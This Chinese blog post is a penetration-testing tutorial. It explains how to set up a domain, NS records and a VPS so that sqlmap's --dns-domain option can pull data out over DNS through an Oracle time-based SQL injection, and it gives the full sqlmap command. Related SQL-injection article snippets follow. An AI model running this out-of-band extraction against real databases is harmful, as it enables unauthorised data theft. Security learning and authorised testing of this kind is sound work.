sqlmap使用_使用sqlmap结合dnslog快速注入

最新推荐文章于 2024-03-18 00:36:47 发布
最新推荐文章于 2024-03-18 00:36:47 发布
阅读量436 收藏
点赞数
文章标签: sqlmap使用

0x01 起因

实际项目中遇到一个oracle延时注入,需要获取数据,几十个库几百张表,等找到关键数据不知道要到哪天.

测试支持带外请求

8d04d607a2a0384dda69e757d7c2a7d9.png

71534736f861d01d01f753052d054bcf.png

于是想用使用sqlmap利用DNS进行OOB注入

0x02 阿里云主机与DNS解析配置

1.首先购买一个域名并且进行备案,然后还需要一台vps

966ec3a00835ca16eb5a8d7724537f7d.png

3ec51474618c35b5d82d06ff59011fe4.png

2.配置DNS解析

创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.top-->vps ip

7e6e113238653a48c1c6025a6f2df506.png

修改DNS为ns1.cwkiller.top ns2.cwkiller.top

dad6134c929aa050a26ddecef59bc6ec.png

解析域名

67c8a167ea7b552f7c939371fe00c47c.png

添加ns1、ns2、*三个主机记录记录值为vps ip

3bf6f0a2a5cbc013e4ee3f14bef75621.png

等待状态正常和显示这个

793bf005fb81d045b192d3d86d16db76.png

在本机ping ceshi.cwkiller.top vps执行 tcpdump -n port 53 收到请求说明配置正确

d29a6764f89bb9f7501e1718dee4df78.png

0x03 使用sqlmap --dns-domain快速注入

使用以下命令获取表名

 python sqlmap.py -r 2.txt --dbms=oracle --dns-domain=cwkiller.top -D app --columns --batch

88a7dfd9277c28d0782cf5b9fdb1d906.png

选中部分代表DNS通道建立成功,可以看到一秒钟能跑多条数据.

weixin_39962675
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SqlmapDnsCollaborator:Burp扩展,可​​让您将Burp Collaborator用作DNS服务器,以通过Sqlmap渗出数据
02-14
SqlmapDnsCollaborator SqlmapDnsCollaborator是一个Burp扩展,可​​让您使用零配置的Sqlmap执行DNS渗透。 您将不需要DNS服务器或公共IP,只需一台具有Sqlmap和Burp的计算机即可。 通常如何使用Sqlmap执行DNS渗透: 您设置了DNS服务器! 您在该服务器上运行Sqlmap,该服务器对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到您的DNS服务器。 DNS请求由Sqlmap解释。 如何使用SqlmapSqlmapDnsCollaborator执行DNS渗透: 您在计算机上打开Burp并启用SqlmapDnsCollaborator。 您在计算机上运行Sqlmap,这会对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到Burp Colla
【sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 6241
【延时注入结合if、case when 延时注入
DNSLog注入SQLmap工具使用
最新发布
2301_80034711的博客
03-18 843
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLogSqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
Oracle基于延时的盲注总结
mingyqf的博客
04-23 862
oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注;
82.网络安全渗透测试—[SQL注入篇21]—Oracle+JSP-pipe.receive_message延时注入
qwsn
01-21 6990
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 延时注入 1、简介 2、注入技巧 二、pipe.receive_message 延时注入示例 1、判断是否存在注入 2、猜解长度并逐个猜解字符 3、以上可以替换的SQL语句
oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入
weixin_35679813的博客
04-07 695
WEB安全第四章SQL注入篇21 oracle 延时注入1、简介DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制。首先,不能直接将该函数注入子查询中,因为Oracle不支持堆叠查询(stacked query)。其次,只有数据库管理员才能使用DBMS_LOCK包。在Oracle PL/SQL中有一种更好的办法,可以使用下面的指令以内联方式注入延迟:dbms_...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,...攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sqlmap结合dnslog快速注入
weixin_67259816的博客
05-22 663
该文章记录了搭建dns服务器,和使用sqlmap结合dnslog快速注入数据
oracle延时盲注如何防止,关于oracle延时型注入手工注入的思考
weixin_36274355的博客
04-07 430
平时遇到oracle注入的情况不是很多,今天遇到一处oracle注入的延时型注入,简单记录一下。测试和漏洞挖掘中,通过页面响应时间状态,通过这种方式判断SQL是否被执行的方式,便是延时性注入,oracle延时性注入和其他的数据库不同,oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),也是通过sqlmap和网上师傅们的文章才知道的,当去手注的时候大脑一片空白,网上...
【sql注入sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 1912
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 694
SQL注入——DNSlog注入
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 5781
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
sqlmap + dnslog外带数据:
CYLK1987310466的博客
08-06 991
sqlmap dnslog外带数据
sqlmap使用教程sql注入
08-17
sqlmap是一种用于检测和利用SQL注入漏洞的工具,它可以帮助安全测试人员或研究人员识别并利用存在于Web应用程序中的SQL注入漏洞。然而,使用sqlmap进行未经授权的测试是非法的,并且可能导致法律后果。如果您对SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值